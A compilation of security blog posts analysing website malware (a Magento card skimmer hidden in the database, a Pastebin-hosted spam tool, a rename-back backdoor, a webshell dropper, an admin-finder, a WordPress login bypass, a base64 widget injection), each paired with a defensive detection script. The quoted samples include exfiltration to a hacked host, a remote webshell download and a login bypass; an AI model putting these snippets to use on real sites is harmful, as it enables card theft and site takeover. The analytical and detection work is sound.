Database and Image Tricks in Magento Malware

Magento malware that steals customer credit card details has been a prevalent problem for the last couple of years. We write a lot about various modifications of such malware and the tricks hackers use. When you look back, it’s interesting to see how common ideas are reused in different steps of the attack.


Database

It’s a common trick to inject malware directly into the Magento database, which helps avoid modification of files on the server. The most typical target is the design/head/includes rows of the core_config_data table. The HTML code from those records is used to build the site pages, so it’s a perfect place for injection of JavaScript code that monitors form input and sends entered data to third-party servers.

Images

Another common theme is using image files to transfer stolen data. Since 2015 (the notorious Visbot malware), we’ve seen many different variations of server-side malware that save stolen data in files with image extensions (.jpg, .png, .gif). Files with such extensions raise little suspicion since they are not executable. At the same time, they can be easily downloaded from the compromised sites. Some malware saved the data in plain text. More complex attacks appended the data to existing legitimate image files. Visbot and its "Fake SUPEE-5344 Patch" modification used public keys to encrypt the data saved in the .jpg files, which also helped make the files look like real binary images.

The "Fake SUPEE-5344 Patch" malware also had a backdoor functionality. It executed arbitrary shell commands passed in the “jpg” request parameter. Apparently, everything related to images is considered benign. Another JavaScript malware sends stolen data to a third-party server, but instead of making a direct AJAX call to that remote URL, it builds an <img> tag with that remote URL as its src parameter. The result is the same, but now it looks as if it’s loading an image from a remote server, not sending data to a remote server.

Recently, we came across a combination of all the above tricks. An obfuscated script was found in the design/footer/absolute_footer row of the core_config_data table.

<script>
this["eval"]("%:){(-7{^-&//`\n5&-8\'2,-{(\':)\'sr \n{{...skipped
...String(A).split("").reverse().join("");return H.charAt(A.indexOf(W))}));
</script>

Once decoded, it was clear that it steals data from Magento checkout pages

if((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) { ...

And sends it to a remote hacked site:

...
if(cc.test(snd)){ asd="1" ; } 
var http = new XMLHttpRequest(); 
http.open("POST","https://<hacked-site>/lib/paypal_icon.jpg",true); 
http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
http.send("data="+snd+"&asd="+asd+"&id_id=infected-site.com"); 
...

The URL of the remote script looks like the URL of an image file: https://<hacked-site>/lib/paypal_icon.jpg. One might think that the script loads a PayPal icon for the checkout page. Of course, it makes little sense. And when you notice that the script uses the POST method to open that “image” and passes form data as parameters, it becomes clear that paypal_icon.jpg is not an image - it’s a server-side script that pretends to be an image (most likely either using .htaccess tricks like mod_rewrite or changing the handler and MIME type for the .jpg extension inside the /lib directory).
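Both tricks from this post (injection into design/* rows of core_config_data and exfiltration disguised as an image request) can be hunted for directly in the database. The following scanner is an added example written for this article, not code from Sucuri or from Magento; it scores each (path, value) row against the indicators quoted above. The sample rows are constructed, hacked-site.example stands in for the real hostname, and the obfuscated payload is a placeholder. fetch_design_rows() assumes a DB-API cursor such as pymysql and is not exercised offline.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample rows in the shape of Magento's core_config_data (path, value).
# The obfuscated payload is a placeholder; the third row is modelled on the
# decoded skimmer quoted above, with the hostname replaced by an example one.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    ("design/head/includes",
     '<link rel="stylesheet" href="/skin/frontend/base/default/css/styles.css"/>'),
    ("design/footer/absolute_footer",
     '<script>this["eval"]("%:){(-7{^-&//`...PLACEHOLDER...");</script>'),
    ("design/footer/absolute_footer",
     '<script>if((new RegExp("onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout"))'
     '.test(window.location)){var http=new XMLHttpRequest();'
     'http.open("POST","https://hacked-site.example/lib/paypal_icon.jpg",true);'
     'http.send("data="+snd);}</script>'),
]

# Indicators seen in database-injected skimmers; a row is flagged when it carries
# a <script> tag and at least one of these.
RULES = [
    ("eval_call", re.compile(r'this\s*\[\s*["\']eval["\']\s*\]|\beval\s*\(', re.I)),
    ("checkout_page_test", re.compile(r'onepagecheckout|onestepcheckout|firecheckout|simplecheckout', re.I)),
    ("xhr_post", re.compile(r'XMLHttpRequest|\.open\s*\(\s*["\']POST', re.I)),
    ("post_to_image_url", re.compile(
        r'\.open\s*\(\s*["\']POST["\']\s*,\s*["\'][^"\']+\.(?:jpe?g|png|gif)\b', re.I)),
    ("image_beacon", re.compile(r'new\s+Image\s*\(|createElement\s*\(\s*["\']img["\']', re.I)),
]


def scan_row(path: str, value: str) -> Dict:
    """Score one config row; returns the matched indicator names."""
    has_script = re.search(r'<script\b', value, re.I) is not None
    hits = [name for name, rx in RULES if rx.search(value)]
    return {"path": path, "has_script": has_script, "hits": hits,
            "suspicious": has_script and bool(hits)}


def scan_rows(rows: List[Tuple[str, str]]) -> List[Dict]:
    """Return only the rows that look like an injected skimmer."""
    return [r for r in (scan_row(p, v) for p, v in rows) if r["suspicious"]]


def fetch_design_rows(cursor) -> List[Tuple[str, str]]:
    """Pull candidate rows with a DB-API cursor (assumed pymysql-style; not run offline).
    design/* rows are the ones Magento renders into every page."""
    cursor.execute("SELECT path, value FROM core_config_data "
                   "WHERE path LIKE 'design/%' AND value LIKE '%<script%'")
    return [(p, v or "") for p, v in cursor.fetchall()]


if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(f"{finding['path']}: {', '.join(finding['hits'])}")
```

The LIKE filter in fetch_design_rows() only narrows the candidate set; a legitimate design/head/includes row often carries a <script> tag for analytics, so the indicator list, not the presence of a script tag, is what decides. Tune RULES to your store rather than trusting a single hit.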

This malware reminds us once again that we should not trust any code, requests, or files just because they are related (or seem to be related) to images. And don’t limit your malware scans to files on the server. Most modern CMSs can’t work without a database, and databases are a common target for infections.

For more information about security issues of Magento and other ecommerce platforms, please check the Ecommerce security section of our blog. If you need someone to clean and protect your site, you can count on us.

Spamming Stopped by Pastebin

We wrote multiple times about malware attacks that store their scripts on Pastebin.com and load them either to the server once they break into it or directly to the infected web pages.

However, Pastebin.com can’t be called reliable hosting for malware. You can report any paste, and it will be removed if Pastebin.com finds it unacceptable. For example, when we find that a certain paste is being used in ongoing attacks, we report it.

What happens when a paste is removed from Pastebin.com? Of course, hackers eventually notice it and create new pastes and reconfigure the attack to use them, but for some period of time their attack is disrupted. From time to time we find signs of such disrupted attacks on infected sites. For example, recently our scanner found this file on a hacked site: skin/adminhtml/default/kontools/promailerv2.php.


Despite the .php extension, its content was pure HTML. The title of the page was "Pastebin.com - Page Removed" and the rest of the content was identical to what Pastebin.com returns when you request a removed or expired paste:

This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.

The code of the page contained the URL of the original paste: pastebin[.]com/HqhHiwSB. It was indeed removed. We found its original content in Google’s cache. It, as the filename implies, contained the code of a PHP script called “PRO Mailer V2” - a tool for sending out spam and phishing emails. It was uploaded on September 18, 2016 by someone in East Java, Indonesia, along with some other malicious scripts (shells, defacement, and spam tools).

If you ever come across a malicious campaign that actively uses Pastebin.com, please spend a few moments to report the pastes that it uses. You may help many people. If you ever have a need to publish some malicious (suspicious) code on Pastebin.com or another similar service (e.g. if you found it on your site and need advice), please make it unexecutable by adding some comments at the top, or by making other obvious changes that would prevent it being used in attacks directly off of Pastebin.com. Also consider making such pastes private and expire in a minimal reasonable time.

If you find "Pastebin.com - Page Removed" files on your server, it’s a strong indication of a hack and you should investigate this issue. Let us know if you need professional help.
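A remnant like the one above has two tells: a .php filename whose content contains no PHP at all, and the Pastebin removal notice (often with the original paste URL still in the markup). The following finder is an added example for this post, not Sucuri's scanner; it classifies file contents on those two tells and extracts paste IDs as indicators for your own report. The sample remnant is constructed from the notice text quoted above, and the paste ID AbCdEf12 in it is a placeholder.

```python
import os
import re
from typing import Dict, List

PASTEBIN_REMOVED_TITLE = re.compile(r'<title>\s*Pastebin\.com\s*-\s*Page Removed', re.I)
REMOVED_NOTICE = re.compile(r'This page is no longer available', re.I)
PASTE_URL = re.compile(r'pastebin\.com/(?:raw/)?([A-Za-z0-9]{8})')
PHP_OPEN_TAG = re.compile(r'<\?(?:php\b|=)')


def classify(path: str, content: str) -> Dict:
    """Flag a file that claims to be PHP but is really a Pastebin removal page."""
    is_php_name = path.lower().endswith(('.php', '.phtml'))
    has_php_code = PHP_OPEN_TAG.search(content) is not None
    removed_page = bool(PASTEBIN_REMOVED_TITLE.search(content) or REMOVED_NOTICE.search(content))
    return {
        "path": path,
        "removed_page": removed_page,
        "extension_mismatch": is_php_name and not has_php_code,
        "paste_ids": sorted(set(PASTE_URL.findall(content))),
        # an HTML document stored under a .php name is worth a look even without the notice
        "suspicious": removed_page or (is_php_name and not has_php_code and '<html' in content.lower()),
    }


def scan_tree(root: str) -> List[Dict]:
    """Disk wrapper: walk a webroot and classify every .php/.phtml file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(('.php', '.phtml')):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, 'r', encoding='utf-8', errors='replace') as fh:
                    content = fh.read(64 * 1024)  # remnant pages are small; cap the read
            except OSError:
                continue
            result = classify(full, content)
            if result["suspicious"]:
                findings.append(result)
    return findings


# Constructed sample of what a remnant such as skin/adminhtml/default/kontools/promailerv2.php
# looks like, built from the notice quoted in the post. The paste ID is a placeholder.
SAMPLE_REMNANT = """<!DOCTYPE html>
<html><head><title>Pastebin.com - Page Removed</title>
<link rel="canonical" href="https://pastebin.com/AbCdEf12" />
</head><body>
<p>This page is no longer available. It has either expired, been removed by its creator,
or removed by one of the Pastebin staff.</p>
</body></html>"""

SAMPLE_LEGIT = "<?php\n// ordinary skin helper\necho 'ok';\n"

if __name__ == "__main__":
    print(classify("skin/adminhtml/default/kontools/promailerv2.php", SAMPLE_REMNANT))
```

Run scan_tree() against the document root; a hit with paste_ids tells you which paste the attacker's loader was fetching, which is also the ID to quote when you report the campaign.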

Release the Prisoners – Rename .Suspected Backdoors

When webmasters or hosting companies look for malware, they usually search for encrypted code, encoded payloads, suspicious functions and much more. If they happen to find any of those instances, it’s a common practice to either remove or rename the file in question.

If the flagged file contains a certain amount of suspicious code or raises red flags based on other variables, hosting companies may rename it from file.php to file.php.suspected (appending .suspected at the end) - this way the file loses its ability to be interpreted by the webserver. However, sometimes there are backdoors nearby ready to release the prisoners.

The following code was found during an incident response investigation:

<?php
if (file_exists('wp-rmcc.php.suspected')) {
 chmod('wp-rmcc.php.suspected', 0777);
 rename('wp-rmcc.php.suspected','wp-rmcc.php');
}
@chmod("wp-rmcc.php",0444);
?>

A very short but interesting snippet that checks if the file wp-rmcc.php.suspected exists. If it does, the code changes its permissions to 777 and renames it to wp-rmcc.php, therefore allowing the code to be executed again. It also does one more thing. Have you noticed this last short piece of code?

@chmod("wp-rmcc.php",0444);

It sets the permissions for the file read-only to prevent easy removal of the malicious code. Of course the example above is very simple and targeted to only that particular file, but the script could be easily modified to rename all files with the .suspected extension.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website by having those other small infected files around, even if the obvious backdoor is renamed/blocked. That’s why simply renaming those easy-to-spot malicious files may not solve the case.
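The weakness of the .suspected convention is that the file stays inside the webroot, where a sibling script can rename() it back, and the chmod 0444 trick slows down removal. The helper below is an added example for this post, not a Sucuri tool; it moves a flagged file out of the served tree into a quarantine directory, stores it read-only under its SHA-256, logs a manifest line, and then lists sibling PHP files that still mention the file name (the shape of the rename-back backdoor shown above). demo() builds a throwaway webroot with a placeholder wp-rmcc.php and a constructed sibling to show the flow; the directory names are assumptions.

```python
import hashlib
import json
import os
import shutil
import stat
import tempfile
import time
from typing import Dict, List


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def quarantine(path: str, quarantine_dir: str) -> Dict:
    """Move a flagged file out of the webroot instead of renaming it in place.

    The file leaves the tree the web server serves, so a sibling rename() cannot
    restore it; the copy is stored read-only under a content-addressed name; and a
    manifest line records origin and hash for later analysis.
    """
    digest = sha256_of(path)
    os.makedirs(quarantine_dir, exist_ok=True)
    dest = os.path.join(quarantine_dir, digest + ".quarantined")
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)   # clear the 0444 read-only trick first
    shutil.move(path, dest)
    os.chmod(dest, stat.S_IRUSR)                   # 0400: analysts can read, nothing executes
    record = {"original_path": os.path.abspath(path), "sha256": digest,
              "quarantined_at": int(time.time()), "stored_as": dest}
    with open(os.path.join(quarantine_dir, "manifest.jsonl"), "a", encoding="utf-8") as mf:
        mf.write(json.dumps(record) + "\n")
    return record


def find_siblings_referencing(webroot: str, filename: str) -> List[str]:
    """PHP files under webroot that mention the quarantined name, e.g. in a rename() call."""
    hits = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    if filename in fh.read():
                        hits.append(full)
            except OSError:
                pass
    return sorted(hits)


def demo() -> Dict:
    """Constructed scenario: a webroot with a flagged wp-rmcc.php and a sibling that would rename it back."""
    base = tempfile.mkdtemp(prefix="quarantine-demo-")
    webroot = os.path.join(base, "public_html")
    os.makedirs(webroot)
    flagged = os.path.join(webroot, "wp-rmcc.php")
    with open(flagged, "w") as fh:
        fh.write("<?php /* placeholder standing in for the flagged file */ ?>")
    os.chmod(flagged, 0o444)  # mimic the read-only bit the malware sets
    with open(os.path.join(webroot, "wp-helper.php"), "w") as fh:  # constructed sibling
        fh.write("<?php if (file_exists('wp-rmcc.php.suspected')) { rename('wp-rmcc.php.suspected','wp-rmcc.php'); }")
    record = quarantine(flagged, os.path.join(base, "quarantine"))
    result = {
        "record": record,
        "still_in_webroot": os.path.exists(flagged),
        "siblings": [os.path.basename(s) for s in find_siblings_referencing(webroot, "wp-rmcc.php")],
        "stored_mode": stat.S_IMODE(os.stat(record["stored_as"]).st_mode),
    }
    shutil.rmtree(base)
    return result


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The sibling search is deliberately crude (a substring match); its purpose is to surface the "nearby" files the post describes so they get reviewed in the same incident rather than left behind.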

If you need professional help on getting the issues fixed, we’d be happy to assist you!

Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to increase those odds is injecting a file known as a Dropper that downloads the real malware into the system. The Dropper can go undetected for a long time because it usually doesn’t have any obfuscated function, encoding, or anything that is malicious per se. Its sole purpose is to download and write the malware into the system, as you can see in the snippet below:

<?php
if( $z = fopen( 'include4.php', 'w') ) {
    if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
        fclose( $z );
        echo '0';
    } else {
        echo '1';
    }
} else {
    echo '2';
}

If you are unfamiliar with PHP, don’t worry, the snippet is pretty straightforward. The Dropper tries to download the malware (webshell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed in the response, the well-known exit code in UNIX systems for successful execution of a command. If it can’t download the webshell, it prints 1; if it can’t create the file in which the shell will reside, it prints 2.

The following code is the content of the webshell fetched from the 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php' link by the Dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net
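A dropper leaves exactly the trace a File Integrity Monitoring system is built to catch: a new PHP file (include4.php above) appearing in the webroot, or an existing one changing. The following minimal FIM is an added example for this post, not Sucuri's product; it snapshots SHA-256 hashes of watched files, stores them as a JSON baseline, and reports added, removed and modified paths on the next run. demo() stages a constructed site in a temporary directory and simulates the dropper's write; the file names and contents are placeholders.

```python
import hashlib
import json
import os
import shutil
import tempfile
from typing import Dict, List

# Extensions worth baselining on a PHP site; .htaccess is included because handler
# and rewrite tricks live there.
WATCH_EXT = (".php", ".phtml", ".js", ".htaccess")


def file_hash(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: str) -> Dict[str, str]:
    """Map of relative path -> sha256 for every watched file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(WATCH_EXT):
                full = os.path.join(dirpath, name)
                result[os.path.relpath(full, root)] = file_hash(full)
    return result


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    return {
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
    }


def save_baseline(root: str, path: str) -> None:
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(snapshot(root), fh, indent=1, sort_keys=True)


def load_baseline(path: str) -> Dict[str, str]:
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a clean site, then simulate the dropper writing
    include4.php and an existing file being tampered with, and report the difference."""
    base = tempfile.mkdtemp(prefix="fim-demo-")
    site = os.path.join(base, "public_html")
    os.makedirs(os.path.join(site, "includes"))
    with open(os.path.join(site, "index.php"), "w") as fh:
        fh.write("<?php echo 'site'; ?>")
    with open(os.path.join(site, "includes", "config.php"), "w") as fh:
        fh.write("<?php $db = 'prod'; ?>")
    baseline_file = os.path.join(base, "baseline.json")  # keep the real one outside the webroot
    save_baseline(site, baseline_file)
    # the dropper's fwrite(): a new PHP file appears in the webroot
    with open(os.path.join(site, "include4.php"), "w") as fh:
        fh.write("<?php /* placeholder standing in for the fetched webshell */ ?>")
    # ...and an existing file gets an injection appended
    with open(os.path.join(site, "index.php"), "a") as fh:
        fh.write("<?php /* injected */ ?>")
    report = diff_snapshots(load_baseline(baseline_file), snapshot(site))
    shutil.rmtree(base)
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Keep the baseline file and the script outside the document root and re-baseline only after a deliberate deploy; otherwise an attacker who writes into the webroot can also rewrite the hashes you compare against.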

Not that impressive hack tool

There is often a misconception regarding the tools that attackers implement in their malicious activity, and that misconception is that they must be using advanced computer programs to target and exploit other computers.


This is not always true, and it is not uncommon to see simplistic tools used, such as the following:

This tool uses simple PHP coding to create an array of segmented URLs that are then appended to the domain name that is provided by the malicious user. It's commonly known as an admin finder as noted by the web page title (hacker group name removed).

if (isset($_POST["submit_lol"])) {
    $url = $_POST['hash_lol'];
    echo "<br /> COCOL ".$url."<br /><br />";

    $adminlocales = array("/adminweb/index.php", "/adminsekolah", "/webmaster", "/operator", "/redaktur", "/moderator", "/login@web", "/admin@web", "/adminlogin", "/loginpanel", "/adminpanel", "/login@web", "/admin1.php", "/adminweb", "/Login", "/login", "/redaktur", "/redakturweb", "/administrator", "/sika", "/develop", "/ketua", "/author", "/user", "/users", "/dinkesadmin", "/retel", "/panel", "/paneladmin", "/panellogin", "/redaksi", "/cp-admin", "/master", "/master/index.php", "/master/login.php", "/operator/index.php", "/sika/index.php", "/develop/index.php", "/ketua/index.php", "/redaktur/index.php", "/admin/index.php", "/administrator/index.php", "/adminweb/index.php", "/user/index.php", "/users/index.php", "/dinkesadmin/index.php", "/retel/index.php", "/author/index.php", "/panel/index.php", "/paneladmin/index.php", "/panellogin/index.php", "/redaksi/index.php", "/cp-admin/index.php", "/operator/login.php", "/sika/login.php", "/develop/login.php", "/ketua/login.php", "/redaktur/login.php", "/admin/login.php", "/administrator/login.php", "/adminweb/login.php");

    foreach ($adminlocales as $admin){
        $headers = get_headers("$url$admin");
        if (eregi('200', $headers[0])) {
            echo "<a href='$url$admin'>$url$admin</a> >>> KETEMU GAN!<br />";
        }
        else {
            echo "$url$admin >>> GAK BISA GAN!<br />";
        }
    }
}

The coding behind the tool itself is almost as simple as the web page it displays. It just captures the domain name through a POST request sent via HTML form, assigns it to the $url variable, then uses a pre-set array of common admin segmented URLs through the $adminlocales variable, and combines the two to complete a full URL. Afterwards, it sends a request and if the request comes back with a valid HTTP "200 OK" code, then it outputs the URL with the Indonesian text "KETEMU GAN!" (I couldn't find an accurate translation, but I assume it's "URL GOOD"). If the web server returns anything other than "200 OK", then it outputs the "GAK BISA GAN!" text.

From there, attackers may use the results of the tool to gain access to administrator interfaces through brute force attempts.

All things considered, it's a very unsophisticated tool and could be much more efficient if run from a terminal with a proxy connection versus a compromised web server.
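Unsophisticated or not, a tool like this leaves a loud footprint in the access log: one client requesting dozens of admin-looking paths within seconds, most of them answered with 404. The detector below is an added example for this post, not part of Sucuri's tooling; it parses combined-format log lines, keeps only requests for admin-shaped paths, and raises an alert when one IP hits at least min_paths distinct such paths inside window_seconds with a 404 ratio above min_404_ratio, reporting which paths it actually found. The log lines, IP addresses and thresholds are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional

# Combined (Apache/nginx default) access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Generic shape of the paths an admin-finder wordlist probes for; a defender needs
# the pattern, not the tool's whole list.
ADMIN_HINT = re.compile(
    r'/(?:admin\w*|administrator|login\w*|panel\w*|webmaster|moderator|cp-admin|master|operator)(?:/|\.php|$)',
    re.I)


def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "path": m["path"], "status": int(m["status"])}


def detect_admin_scans(lines, window_seconds: int = 60, min_paths: int = 5,
                       min_404_ratio: float = 0.6) -> List[Dict]:
    """One alert per IP that probes many distinct admin-looking paths in a short window."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and ADMIN_HINT.search(rec["path"]):
            by_ip[rec["ip"]].append(rec)
    alerts = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            # shrink the window from the left until it spans at most window_seconds
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            window = recs[start:end + 1]
            if len({r["path"] for r in window}) < min_paths:
                continue
            ratio = sum(r["status"] == 404 for r in window) / len(window)
            if ratio >= min_404_ratio:
                alerts.append({
                    "ip": ip,
                    "distinct_paths": len({r["path"] for r in recs}),
                    # the paths that answered 200 are what the scanner learned about you
                    "found": sorted({r["path"] for r in recs if r["status"] == 200}),
                })
                break
    return alerts


# Constructed sample: a wordlist scan from 203.0.113.7 followed by an ordinary admin login from 198.51.100.4.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2016:10:00:01 +0000] "GET /adminweb/index.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Sep/2016:10:00:02 +0000] "GET /adminsekolah HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Sep/2016:10:00:02 +0000] "GET /webmaster HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Sep/2016:10:00:03 +0000] "GET /operator HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Sep/2016:10:00:03 +0000] "GET /administrator HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Sep/2016:10:00:04 +0000] "GET /admin/login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Sep/2016:10:05:00 +0000] "GET /admin/login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Sep/2016:10:05:30 +0000] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Sep/2016:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for alert in detect_admin_scans(SAMPLE_LOG.splitlines()):
        print(alert)
```

The "found" list is the useful output: it tells you which admin entry point the scanner confirmed, so that is where to expect the brute-force attempts the post mentions next, and where rate limiting or an IP allowlist pays off.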

Malicious script injected to WordPress theme allowing Admin...

On a daily basis we find different kinds of malware like backdoors, credit card stealers, injected scripts, and phishing pages. While each one of those catches our attention, we recently found an interesting WordPress administration login bypass script.


This technique, login bypass, is often used after the website is compromised because attackers can easily access the post, page, and widget section without spending hours trying different username & password combinations in a brute-force attack, for instance.

The malicious script (theme.php) was injected into the theme structure with the intention of blending in with good code and trying to go undetected.

Here is a snippet of the malware:

require('./../../../../../../../wp-blog-header.php');
$query_str = "SELECT ID FROM $wpdb->users";
…
if (user_can($user_id, 'administrator')) {
    …
    $user_login = $user_info->user_login;
    …
    do_action('wp_login', $user_login);
    echo "You are logged in as $user_login";
    if (function_exists('get_admin_url')) {
        wp_redirect(get_admin_url());

The code is very straightforward. First, it includes the wp-blog-header.php file that subsequently loads functions from wp-config.php related to login capabilities.

Second, the malware checks whether the user_id fetched from the database has administrator privileges, fires the wp_login action for that user, and resolves the location of the ‘wp-admin’ URL via the ‘get_admin_url()’ function. If all these criteria match, the attacker is then redirected (wp_redirect) to the wp-admin URL with administrator access to the backend without sending any username / password combination.

In these types of attacks, we also noticed that bogus admin users may be created in the backend interface. If you suspect a compromise, or identify a user with administrator privileges that you haven’t created, we highly recommend taking a backup of your database, removing the user and changing the passwords of all other users.

As a good security practice, users should have access only to the resources they need; WordPress implements this well through the different roles a user can have in the backend (Subscriber, Editor, Contributor, Author, Administrator, etc.). Make sure to take advantage of this feature and prevent further damage to your website and online presence.

We also recommend having a File Integrity Monitor in place and a Website Firewall to prevent further issues from happening.
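What makes theme.php stand out is not any single function but the combination: a file inside wp-content/themes that bootstraps WordPress by itself through a chain of ../ to wp-blog-header.php, queries $wpdb->users, checks for the administrator capability and then fires wp_login or redirects to the admin URL. A theme template never needs to do that, because core has already loaded it. The auditor below is an added example for this post, not Sucuri's scanner; it scores PHP files against those signals and flags the bootstrap-plus-login-manipulation shape. SAMPLE_BYPASS is constructed from the lines quoted above with the elided parts replaced by placeholder comments; wp_set_auth_cookie and wp_set_current_user are included in the signal list because they are the core functions that establish a session, not because the quoted snippet shows them.

```python
import os
import re
from typing import Dict, List

# Signals that a theme file is bootstrapping WordPress on its own and touching login
# state. Legitimate templates receive a loaded environment from core and never
# require wp-blog-header.php / wp-load.php through a chain of '../'.
SIGNALS = {
    "bootstraps_core": re.compile(
        r'(?:require|include)(?:_once)?\s*\(?\s*[\'"](?:\.\./|\./)+[^\'"]*wp-(?:blog-header|load|config)\.php', re.I),
    "queries_users": re.compile(r'SELECT\s+[^;]*FROM\s+\$wpdb->users', re.I),
    "checks_admin_cap": re.compile(r'user_can\s*\(\s*\$\w+\s*,\s*[\'"]administrator[\'"]', re.I),
    "fires_wp_login": re.compile(r'do_action\s*\(\s*[\'"]wp_login[\'"]', re.I),
    "sets_auth": re.compile(r'wp_set_auth_cookie\s*\(|wp_set_current_user\s*\(', re.I),
    "redirects_to_admin": re.compile(r'wp_redirect\s*\(\s*(?:get_)?admin_url\s*\(', re.I),
}


def audit_source(path: str, source: str) -> Dict:
    """Return the matched signal names; the bypass shape is bootstrap + at least two more."""
    hits = [name for name, rx in SIGNALS.items() if rx.search(source)]
    return {"path": path, "hits": hits,
            "suspicious": "bootstraps_core" in hits and len(hits) >= 3}


def audit_theme_dir(theme_dir: str) -> List[Dict]:
    """Disk wrapper: audit every .php file under a theme (or the whole themes/ directory)."""
    findings = []
    for dirpath, _, files in os.walk(theme_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                result = audit_source(full, fh.read())
            if result["suspicious"]:
                findings.append(result)
    return findings


# Constructed sample modelled on the snippet in the post; the elided parts are placeholders.
SAMPLE_BYPASS = """<?php
require('./../../../../../../../wp-blog-header.php');
$query_str = "SELECT ID FROM $wpdb->users";
/* placeholder: query executed, first ID stored in $user_id */
if (user_can($user_id, 'administrator')) {
    /* placeholder: $user_info looked up */
    $user_login = $user_info->user_login;
    do_action('wp_login', $user_login);
    echo "You are logged in as $user_login";
    if (function_exists('get_admin_url')) {
        wp_redirect(get_admin_url());
    }
}
"""

# Constructed sample of an ordinary template for comparison.
SAMPLE_LEGIT = "<?php\nget_header();\nif ( have_posts() ) { the_post(); the_content(); }\nget_footer();\n"

if __name__ == "__main__":
    print(audit_source("wp-content/themes/example/theme.php", SAMPLE_BYPASS))
```

Because the rules key on the bootstrap require, a plugin or theme that legitimately calls wp_set_current_user inside a normal hook will not trip the check; the files worth reading by hand are those that both load core themselves and touch login state.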

Malicious JavaScript Injected in Plugin Widget

Each and every day the attackers get more clever and exploit new attack vectors. Sucuri Labs recently found a malicious JavaScript hidden in the database of a WordPress website.


The malicious code was injected inside a legit widget of the website:

s:6:"filter";b:1;}i:6;a:3:{s:5:"title";s:0:"";s:4:"text";s:515:"<?php$r=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')]; $h=$_SERVER[base64_decode('U0VSVkVSX05BTUU=')]; $s=base64_decode('PHNjcmlwdCBzcmM9Imh0dHAclVmIj48L3ND4NCg=='); $p = strpos($r, $h); if(($p===false)&&($r<>'')){echo $s;}if(current_user_can('administrator') || current_user_can('editor') || current_user_can('author') || current_user_can('contributor')) {?>

No heavy encoding or obfuscation was used for this attack, just simple base64 encoding. After decoding the strings, we found that it loads a malicious “jQuery” JavaScript file from a shortened URL:

<script src="hxxp://g00(.)co/P4YrUf"></script>

